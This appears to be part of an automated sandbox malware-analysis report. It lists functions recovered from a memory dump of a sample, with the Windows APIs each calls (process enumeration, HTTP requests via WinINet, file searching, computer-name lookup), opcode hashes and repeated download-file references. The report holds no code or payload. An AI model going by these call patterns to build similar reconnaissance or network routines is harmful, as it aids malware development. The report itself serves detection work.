Part of subcall function 0026A8A0: lstrcpy.KERNEL32(?,00270E17), ref: 0026A905

CloseHandle.KERNEL32(?), ref: 00268761

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 1066202413-0
Opcode ID: 816949a41af8eb9c5fbedae60d96963e56a9716521317a5a0bafba9c678a5484
Instruction ID: f0d564089f6e66608e459fff985de87814e12b0609b14b5374071e6d84998b87
Opcode Fuzzy Hash: 816949a41af8eb9c5fbedae60d96963e56a9716521317a5a0bafba9c678a5484
Instruction Fuzzy Hash: 3C314D71921218ABCB25EF54CC46FEEB778EF55700F1042A9F50AB21A0DF306A95CFA1

Function 00266AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00D491A8,?,0027110C,?,00000000,?,00271110,?,00000000,00270AEF), ref: 00266ACA
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00266AE8
CloseHandle.KERNEL32(00000000), ref: 00266AF9
Sleep.KERNEL32(00001770), ref: 00266B04
CloseHandle.KERNEL32(?,00000000,?,00D491A8,?,0027110C,?,00000000,?,00271110,?,00000000,00270AEF), ref: 00266B1A
ExitProcess.KERNEL32 ref: 00266B22

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$CreateExitOpenProcessSleep
String ID:
API String ID: 941982115-0
Opcode ID: 5193b21c962b3a9d5dcb2b4a871b9dd74bd460f74abecaaa90599edaf1c27223
Instruction ID: 8777fc946e498b2edc19428bd299e231aadc31d00be2797f3aae031bd301c329
Opcode Fuzzy Hash: 5193b21c962b3a9d5dcb2b4a871b9dd74bd460f74abecaaa90599edaf1c27223
Instruction Fuzzy Hash: 48F05E3096021AEFE710BBE0DC0ABBD7B34FB14705F104526B902B11C1CBF059A0DEAA

Function 002547B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00254839
InternetCrackUrlA.WININET(00000000,00000000), ref: 00254849

Strings

<, xrefs: 002547C9

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: CrackInternetlstrlen
String ID: <
API String ID: 1274457161-4251816714
Opcode ID: e45d87ccb796daedec17daf6657ea5911228f696145ac7819bb5f3d699a13b05
Instruction ID: 04335404e2a6cea9ce22c1118c494f85614ac7558f530b4f92a678aec3b53361
Opcode Fuzzy Hash: e45d87ccb796daedec17daf6657ea5911228f696145ac7819bb5f3d699a13b05
Instruction Fuzzy Hash: A4213EB1D00209ABDF14EFA4E845ADE7B75FB44320F108626F915A72C1EB706A19CF82

Function 002651F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 0026A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0026A7E6

Part of subcall function 00256280: InternetOpenA.WININET(00270DFE,00000001,00000000,00000000,00000000), ref: 002562E1
Part of subcall function 00256280: StrCmpCA.SHLWAPI(?,00D4EAC8), ref: 00256303
Part of subcall function 00256280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00256335
Part of subcall function 00256280: HttpOpenRequestA.WININET(00000000,GET,?,00D4DEA0,00000000,00000000,00400100,00000000), ref: 00256385
Part of subcall function 00256280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 002563BF
Part of subcall function 00256280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002563D1

StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00265228

Strings

ERROR, xrefs: 0026521A
ERROR, xrefs: 00265273

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
String ID: ERROR$ERROR
API String ID: 3287882509-2579291623
Opcode ID: fdbe0ffae23e7ff0a38ced284826c7bb2fde15551ba129f3e7acdc053aff282b
Instruction ID: 0a9e8c491f62d930355b23237ed368fb22057d0da154dcf6a02da5376177f9b5
Opcode Fuzzy Hash: fdbe0ffae23e7ff0a38ced284826c7bb2fde15551ba129f3e7acdc053aff282b
Instruction Fuzzy Hash: B411EF30930148A7CB14FF64DD52AED7378AF50300F904154FD1A67592EF306B65CE91

Function 00264F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00268DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00268E0B

lstrcat.KERNEL32(?,00000000), ref: 00264F7A
lstrcat.KERNEL32(?,00271070), ref: 00264F97
lstrcat.KERNEL32(?,00D48F48), ref: 00264FAB
lstrcat.KERNEL32(?,00271074), ref: 00264FBD

Part of subcall function 00264910: wsprintfA.USER32 ref: 0026492C
Part of subcall function 00264910: FindFirstFileA.KERNEL32(?,?), ref: 00264943

Part of subcall function 00264910: StrCmpCA.SHLWAPI(?,00270FDC), ref: 00264971
Part of subcall function 00264910: StrCmpCA.SHLWAPI(?,00270FE0), ref: 00264987
Part of subcall function 00264910: FindNextFileA.KERNEL32(000000FF,?), ref: 00264B7D
Part of subcall function 00264910: FindClose.KERNEL32(000000FF), ref: 00264B92

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
String ID:
API String ID: 2667927680-0
Opcode ID: 6fe8a86b41ea13bf846ba0a8d54d2bc7918400e2866d751d24918d20bd4debcf
Instruction ID: 4f7001c955a5a2e44b391f824a620af1ae95e651be809529757d25c0b7a15d18
Opcode Fuzzy Hash: 6fe8a86b41ea13bf846ba0a8d54d2bc7918400e2866d751d24918d20bd4debcf
Instruction Fuzzy Hash: CB21887692020467CB54FB70DC46EE9333CAB55300F404565B65953181EE749AF88FD6

Function 00260740 Relevance: 4.7, APIs: 3, Instructions: 217COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,00D48F78), ref: 0026079A
StrCmpCA.SHLWAPI(00000000,00D48F98), ref: 00260866
StrCmpCA.SHLWAPI(00000000,00D490C8), ref: 0026099D

Part of subcall function 0026A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0026A7E6

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: ad6a414d66afaacf26037e8696b2605df2eca7cc432457068ca44a9bf230eb7e
Instruction ID: ddb19902a3a2c5aa7bbe60fb204f5c27e91cdcfffa3f2e7e610d1cf1baeadb59
Opcode Fuzzy Hash: ad6a414d66afaacf26037e8696b2605df2eca7cc432457068ca44a9bf230eb7e
Instruction Fuzzy Hash: FF917B75A202089FCB18EF64DD95BEDB775FF94300F508529E80A9F241DB309A59CF92

Function 00260765 Relevance: 4.7, APIs: 3, Instructions: 197COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,00D48F78), ref: 0026079A
StrCmpCA.SHLWAPI(00000000,00D48F98), ref: 00260866
StrCmpCA.SHLWAPI(00000000,00D490C8), ref: 0026099D

Part of subcall function 0026A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0026A7E6

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: d30f3299215726f124f9668a20752d962ea884a211e8083624d33740b3e199e7
Instruction ID: 31e8f929209762404f883b4a654640d5b9bef6be1770ef486280c017ebacd493
Opcode Fuzzy Hash: d30f3299215726f124f9668a20752d962ea884a211e8083624d33740b3e199e7
Instruction Fuzzy Hash: 55817975B202049FCB18EF64D995AEEB7B5FF94300F508529E80A9F241DB309A55CF82

Function 002678E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00267910
RtlAllocateHeap.NTDLL(00000000), ref: 00267917
GetComputerNameA.KERNEL32(?,00000104), ref: 0026792F

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateComputerNameProcess
String ID:
API String ID: 1664310425-0
